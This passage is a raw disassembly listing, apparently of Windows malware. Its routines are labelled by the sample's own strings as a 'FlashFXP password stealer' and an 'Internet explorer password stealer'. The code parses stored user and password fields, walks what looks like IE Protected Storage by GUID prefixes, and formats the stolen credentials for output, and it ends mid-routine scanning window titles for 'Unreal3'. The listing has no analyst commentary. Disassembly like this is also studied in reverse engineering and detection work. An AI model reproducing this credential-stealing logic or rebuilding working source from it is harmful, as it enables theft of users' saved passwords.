push [ebp+var_5D8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3B4]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push [ebp+var_5CC]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_5D4]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_4C4]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: sub_414A1E+37C�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp+var_544]
push eax
lea eax, [ebp+var_5C4]
push eax
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_3B4]
push eax
push [ebp+var_334]
push offset dword_41D2D8
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp+var_32C]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: sub_414A1E+213�j
; sub_414A1E+22E�j ...
mov eax, [ebp+var_184]
inc eax
mov [ebp+var_184], eax
mov eax, [ebp+var_5DC]
mov [ebp+var_3B8], eax
cmp [ebp+var_3B8], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: sub_414A1E+415�j
mov eax, [ebp+var_3B8]
add eax, 4
mov [ebp+var_3B8], eax
jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: sub_414A1E+37E�j
; sub_414A1E+417�j
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: sub_414A1E:loc_414EA6�j
mov al, [ebp+var_330]
mov [ebp+var_190], al
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_184]
push [ebp+var_334]
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D29C
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: sub_414A1E:loc_414EA8�j
; sub_414A1E:loc_414EAA�j
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: sub_414A1E+3F0�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: sub_414A1E+140�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: sub_414A1E+AC�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: sub_414A1E+48�j
; sub_414A1E+486�j
leave
retn 4
sub_414A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset sub_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; =============== S U B R O U T I N E =======================================
sub_414EF4 proc near ; DATA XREF: sub_415AF0+40�o
mov eax, offset loc_416FDD
call sub_416E10
sub esp, 0FFCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0BF0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-0A00h], 0
and dword ptr [ebp-4], 0
cmp dword ptr [ebp-0A00h], 0
jz short loc_414F4C
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414F4C: ; CODE XREF: sub_414EF4+44�j
and dword ptr [ebp-0A00h], 0
push 0
push 0
push 0
lea eax, [ebp-0A00h]
push eax
call dword_41DF10
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_414FB2
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD0h], 0
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_414FA7
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FA7: ; CODE XREF: sub_414EF4+9F�j
mov eax, [ebp-0FD0h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_414FB2: ; CODE XREF: sub_414EF4+7F�j
and dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-10h], 0
jz short loc_414FCC
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FCC: ; CODE XREF: sub_414EF4+CA�j
and dword ptr [ebp-10h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_414FE3
push 80004003h
call sub_416E40
loc_414FE3: ; CODE XREF: sub_414EF4+E3�j
mov eax, [ebp-0A00h]
mov [ebp-0FE0h], eax
lea eax, [ebp-10h]
push eax
push 0
push 0
mov eax, [ebp-0FE0h]
mov eax, [eax]
push dword ptr [ebp-0FE0h]
call dword ptr [eax+38h]
mov [ebp-0FDCh], eax
cmp dword ptr [ebp-0FDCh], 0
jge short loc_41502D
push offset dword_41D608
push dword ptr [ebp-0FE0h]
push dword ptr [ebp-0FDCh]
call sub_416E4E
loc_41502D: ; CODE XREF: sub_414EF4+121�j
mov eax, [ebp-0FDCh]
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_415095
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD4h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_41506B
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41506B: ; CODE XREF: sub_414EF4+169�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_41508A
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41508A: ; CODE XREF: sub_414EF4+182�j
mov eax, [ebp-0FD4h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_415095: ; CODE XREF: sub_414EF4+14C�j
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D5D4
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-214h], 0
mov al, [ebp-0A54h]
mov [ebp-0A14h], al
and byte ptr [ebp-0A54h], 0
loc_4150CB: ; CODE XREF: sub_414EF4:loc_415A54�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4150DB
push 80004003h
call sub_416E40
loc_4150DB: ; CODE XREF: sub_414EF4+1DB�j
push 0
lea eax, [ebp-0A10h]
push eax
push 1
mov eax, [ebp-10h]
mov [ebp-1000h], eax
mov eax, [ebp-1000h]
mov eax, [eax]
push dword ptr [ebp-1000h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A59
mov eax, [ebp-0BF0h]
cmp dword ptr [eax+4], 0
jz short loc_415119
jmp loc_415A59
; ---------------------------------------------------------------------------
loc_415119: ; CODE XREF: sub_414EF4+21E�j
sub esp, 10h
lea esi, [ebp-0A10h]
mov edi, esp
movsd
movsd
movsd
movsd
push offset asc_41D5D0 ; "%x"
lea eax, [ebp-0A48h]
push eax
call dword_4171E0 ; wsprintfA
add esp, 18h
and dword ptr [ebp-0DF8h], 0
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415163
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415163: ; CODE XREF: sub_414EF4+25B�j
and dword ptr [ebp-0DF8h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41517D
push 80004003h
call sub_416E40
loc_41517D: ; CODE XREF: sub_414EF4+27D�j
mov eax, [ebp-0A00h]
mov [ebp-0FE8h], eax
lea eax, [ebp-0DF8h]
push eax
push 0
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FE8h]
mov eax, [eax]
push dword ptr [ebp-0FE8h]
call dword ptr [eax+3Ch]
mov [ebp-0FE4h], eax
cmp dword ptr [ebp-0FE4h], 0
jge short loc_4151D1
push offset dword_41D608
push dword ptr [ebp-0FE8h]
push dword ptr [ebp-0FE4h]
call sub_416E4E
loc_4151D1: ; CODE XREF: sub_414EF4+2C5�j
mov eax, [ebp-0FE4h]
mov [ebp-0DF4h], eax
loc_4151DD: ; CODE XREF: sub_414EF4:loc_415A30�j
cmp dword ptr [ebp-0DF8h], 0
jnz short loc_4151F0
push 80004003h
call sub_416E40
loc_4151F0: ; CODE XREF: sub_414EF4+2F0�j
push 0
lea eax, [ebp-0E08h]
push eax
push 1
mov eax, [ebp-0DF8h]
mov [ebp-1004h], eax
mov eax, [ebp-1004h]
mov eax, [eax]
push dword ptr [ebp-1004h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A35
and dword ptr [ebp-0E14h], 0
mov byte ptr [ebp-4], 3
cmp dword ptr [ebp-0E14h], 0
jz short loc_415246
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415246: ; CODE XREF: sub_414EF4+33E�j
and dword ptr [ebp-0E14h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_415260
push 80004003h
call sub_416E40
loc_415260: ; CODE XREF: sub_414EF4+360�j
mov eax, [ebp-0A00h]
mov [ebp-0FF0h], eax
lea eax, [ebp-0E14h]
push eax
push 0
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF0h]
mov eax, [eax]
push dword ptr [ebp-0FF0h]
call dword ptr [eax+54h]
mov [ebp-0FECh], eax
cmp dword ptr [ebp-0FECh], 0
jge short loc_4152BB
push offset dword_41D608
push dword ptr [ebp-0FF0h]
push dword ptr [ebp-0FECh]
call sub_416E4E
loc_4152BB: ; CODE XREF: sub_414EF4+3AF�j
mov eax, [ebp-0FECh]
mov [ebp-0E10h], eax
loc_4152C7: ; CODE XREF: sub_414EF4+B18�j
cmp dword ptr [ebp-0E14h], 0
jnz short loc_4152DA
push 80004003h
call sub_416E40
loc_4152DA: ; CODE XREF: sub_414EF4+3DA�j
push 0
lea eax, [ebp-0E0Ch]
push eax
push 1
mov eax, [ebp-0E14h]
mov [ebp-1008h], eax
mov eax, [ebp-1008h]
mov eax, [eax]
push dword ptr [ebp-1008h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A11
push dword ptr [ebp-0E0Ch]
push offset aWs ; "%ws"
lea eax, [ebp-210h]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
and dword ptr [ebp-0E18h], 0
and dword ptr [ebp-0EE8h], 0
and dword ptr [ebp-0EE4h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41534D
push 80004003h
call sub_416E40
loc_41534D: ; CODE XREF: sub_414EF4+44D�j
mov eax, [ebp-0E0Ch]
loc_415353: ; DATA XREF: .packed:off_419100�o
mov [ebp-0FFCh], eax
mov eax, [ebp-0A00h]
mov [ebp-0FF8h], eax
push 0
push dword ptr [ebp-0EE4h]
lea eax, [ebp-0EE8h]
push eax
lea eax, [ebp-0E18h]
push eax
push dword ptr [ebp-0FFCh]
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF8h]
mov eax, [eax]
push dword ptr [ebp-0FF8h]
call dword ptr [eax+44h]
mov [ebp-0FF4h], eax
cmp dword ptr [ebp-0FF4h], 0
jge short loc_4153C7
push offset dword_41D608
push dword ptr [ebp-0FF8h]
push dword ptr [ebp-0FF4h]
call sub_416E4E
loc_4153C7: ; CODE XREF: sub_414EF4+4BB�j
mov eax, [ebp-0FF4h]
mov [ebp-0E10h], eax
push dword ptr [ebp-0EE8h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0E18h]
dec ecx
cmp eax, ecx
jnb loc_415477
and dword ptr [ebp-0EECh], 0
and dword ptr [ebp-0EF0h], 0
jmp short loc_41540C
; ---------------------------------------------------------------------------
loc_4153FE: ; CODE XREF: sub_414EF4+571�j
mov eax, [ebp-0EF0h]
inc eax
inc eax
mov [ebp-0EF0h], eax
loc_41540C: ; CODE XREF: sub_414EF4+508�j
mov eax, [ebp-0EF0h]
cmp eax, [ebp-0E18h]
jnb short loc_415467
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_41543D
mov eax, [ebp-0EECh]
mov byte ptr [ebp+eax-9FCh], 2Ch
jmp short loc_415458
; ---------------------------------------------------------------------------
loc_41543D: ; CODE XREF: sub_414EF4+537�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
mov ecx, [ebp-0EECh]
mov al, [eax]
mov [ebp+ecx-9FCh], al
loc_415458: ; CODE XREF: sub_414EF4+547�j
mov eax, [ebp-0EECh]
inc eax
mov [ebp-0EECh], eax
jmp short loc_4153FE
; ---------------------------------------------------------------------------
loc_415467: ; CODE XREF: sub_414EF4+524�j
mov eax, [ebp-0EECh]
and byte ptr [ebp+eax-9FDh], 0
jmp short loc_415492
; ---------------------------------------------------------------------------
loc_415477: ; CODE XREF: sub_414EF4+4F4�j
push dword ptr [ebp-0EE8h]
push offset dword_418B64
lea eax, [ebp-9FCh]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
loc_415492: ; CODE XREF: sub_414EF4+581�j
push offset byte_41DEC0
lea eax, [ebp-7FCh]
push eax
call dword_4170FC ; lstrcpyA
push offset byte_41DEC0
lea eax, [ebp-0DF0h]
push eax
call dword_4170FC ; lstrcpyA
push offset a220d5cc1 ; "220d5cc1"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz short loc_41550C
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41550C
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D580
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41550C: ; CODE XREF: sub_414EF4+5D6�j
; sub_414EF4+5EE�j
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz loc_4155CE
push offset byte_41DEC0
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415587
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415587: ; CODE XREF: sub_414EF4+659�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D51C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4155CE: ; CODE XREF: sub_414EF4+62C�j
push offset aB9819c52 ; "b9819c52"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz loc_415842
and dword ptr [ebp-0FC8h], 0
mov dword ptr [ebp-0EFCh], 1
and dword ptr [ebp-0FCCh], 0
jmp short loc_415610
; ---------------------------------------------------------------------------
loc_415602: ; CODE XREF: sub_414EF4:loc_4156CF�j
mov eax, [ebp-0FCCh]
inc eax
inc eax
mov [ebp-0FCCh], eax
loc_415610: ; CODE XREF: sub_414EF4+70C�j
mov eax, [ebp-0FCCh]
cmp eax, [ebp-0E18h]
jnb loc_4156D4
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_415652
mov eax, [ebp-0FC8h]
mov byte ptr [ebp+eax-9FCh], 2Ch
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
jmp short loc_4156CF
; ---------------------------------------------------------------------------
loc_415652: ; CODE XREF: sub_414EF4+73F�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov al, [eax]
push eax
call dword_4171DC ; IsCharAlphaNumericA
test eax, eax
jnz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 40h
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 5Fh
jnz short loc_4156CF
loc_4156A7: ; CODE XREF: sub_414EF4+775�j
; sub_414EF4+789�j ...
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov ecx, [ebp-0FC8h]
mov al, [eax]
mov [ebp+ecx-9FCh], al
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
loc_4156CF: ; CODE XREF: sub_414EF4+75C�j
; sub_414EF4+7B1�j
jmp loc_415602
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_414EF4+728�j
mov eax, [ebp-0FC8h]
and byte ptr [ebp+eax-9FDh], 0
lea eax, [ebp-9FAh]
mov [ebp-0EF4h], eax
and dword ptr [ebp-0EF8h], 0
jmp short loc_415704
; ---------------------------------------------------------------------------
loc_4156F7: ; CODE XREF: sub_414EF4:loc_41583D�j
mov eax, [ebp-0EF8h]
inc eax
mov [ebp-0EF8h], eax
loc_415704: ; CODE XREF: sub_414EF4+801�j
mov eax, [ebp-0EE8h]
movzx eax, byte ptr [eax+4]
cmp [ebp-0EF8h], eax
jge loc_415842
mov eax, [ebp-0EF4h]
inc eax
push eax
lea eax, [ebp-0FC4h]
push eax
call dword_4170FC ; lstrcpyA
push offset dword_41D50C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_41575C
push offset dword_41D50C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_41575C: ; CODE XREF: sub_414EF4+850�j
push offset dword_41D50C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415798
push offset dword_41D50C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
inc eax
push eax
lea eax, [ebp-0F60h]
push eax
call dword_4170FC ; lstrcpyA
loc_415798: ; CODE XREF: sub_414EF4+87E�j
push offset dword_41D50C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4157C5
push offset dword_41D50C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4157C5: ; CODE XREF: sub_414EF4+8B9�j
push offset dword_41D50C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov esi, eax
lea eax, [ebp-0F60h]
push eax
call dword_41703C ; lstrlenA
lea eax, [esi+eax+9]
mov [ebp-0EF4h], eax
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41583D
lea eax, [ebp-0F60h]
push eax
lea eax, [ebp-0FC4h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D4CC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41583D: ; CODE XREF: sub_414EF4+91F�j
jmp loc_4156F7
; ---------------------------------------------------------------------------
loc_415842: ; CODE XREF: sub_414EF4+6EE�j
; sub_414EF4+820�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz loc_4159E0
push offset aStringindex ; "StringIndex"
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz loc_4159E0
push offset dword_41D4AC
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4158A4
push offset dword_41D4AC
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4158A4: ; CODE XREF: sub_414EF4+998�j
push 8
lea eax, [ebp-210h]
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_417100 ; lstrcpynA
push offset dword_41D4A4
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
push offset dword_41D49C
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_415933
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D454
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_415933: ; CODE XREF: sub_414EF4+A15�j
jmp loc_4159E0
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_414EF4+9DB�j
; sub_414EF4+9F2�j
push offset byte_41DEC0
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset dword_41D50C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415999
push offset dword_41D50C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset dword_41D50C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415999: ; CODE XREF: sub_414EF4+A6B�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D3F8
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4159E0: ; CODE XREF: sub_414EF4+962�j
; sub_414EF4+97D�j ...
push 200h
push 0
lea eax, [ebp-210h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 200h
push 0
lea eax, [ebp-9FCh]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4152C7
; ---------------------------------------------------------------------------
loc_415A11: ; CODE XREF: sub_414EF4+410�j
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0E14h], 0
jz short loc_415A30
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A30: ; CODE XREF: sub_414EF4+B28�j
jmp loc_4151DD
; ---------------------------------------------------------------------------
loc_415A35: ; CODE XREF: sub_414EF4+326�j
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415A54
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A54: ; CODE XREF: sub_414EF4+B4C�j
jmp loc_4150CB
; ---------------------------------------------------------------------------
loc_415A59: ; CODE XREF: sub_414EF4+20E�j
; sub_414EF4+220�j
mov al, [ebp-0A14h]
mov [ebp-0A54h], al
push 3E8h
call dword_41709C ; Sleep
push dword ptr [ebp-214h]
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D3BC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 10h
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD8h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_415ABB
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ABB: ; CODE XREF: sub_414EF4+BB9�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_415ADA
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ADA: ; CODE XREF: sub_414EF4+BD2�j
mov eax, [ebp-0FD8h]
loc_415AE0: ; CODE XREF: sub_414EF4+B9�j
; sub_414EF4+19C�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
leave
retn 4
sub_414EF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_41DF10, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset sub_414EF4
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3F proc near ; CODE XREF: .packed:00416FB6�p
; .packed:00416FBF�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: sub_415B3F+D�j
leave
retn
sub_415B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B60 proc near ; DATA XREF: sub_415DFD+35�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5C0 = dword ptr -5C0h
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_41C = byte ptr -41Ch
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5B8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
and [ebp+var_5C4], 0
and [ebp+var_410], 0
and [ebp+var_40C], 0
and [ebp+var_408], 0
and [ebp+var_404], 0
and [ebp+var_5BC], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: sub_415B60:loc_415C50�j
mov eax, [ebp+var_5BC]
inc eax
mov [ebp+var_5BC], eax
loc_415BC2: ; CODE XREF: sub_415B60+53�j
cmp [ebp+var_5BC], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp+var_400]
push eax
push [ebp+var_5BC]
call dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp+var_400]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
